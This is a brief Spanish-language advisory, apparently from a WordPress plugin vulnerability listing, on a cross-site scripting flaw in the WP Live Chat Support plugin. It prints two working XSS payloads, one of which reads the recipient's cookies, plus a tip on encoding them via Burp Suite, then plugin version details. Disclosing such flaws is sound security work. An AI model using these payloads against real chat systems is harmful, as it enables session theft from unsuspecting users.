Vulnerabilidad Plugin: WP Live Chat Support

Enviar cualquiera de los siguientes mensajes a través de chat ejecuta JavaScript no deseado en la ventana de chat de los receptores:

<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 />

x”</title><img src%3dx onerror%3dalert(1)>

Si tiene problemas para reproducir, puede intentar enviarlos a través de Burp Suite, que debería hacer el truco ya que la carga útil necesita ser codificada.

Ficha del Plugin

Versión Actual: 8.1.1
Requisitos: 4.4
Probado en WordPress: 5.2.4
Total Descargas: 1,658,978
Última actualización: 2019-10-17 12:20pm GMT

Ir arriba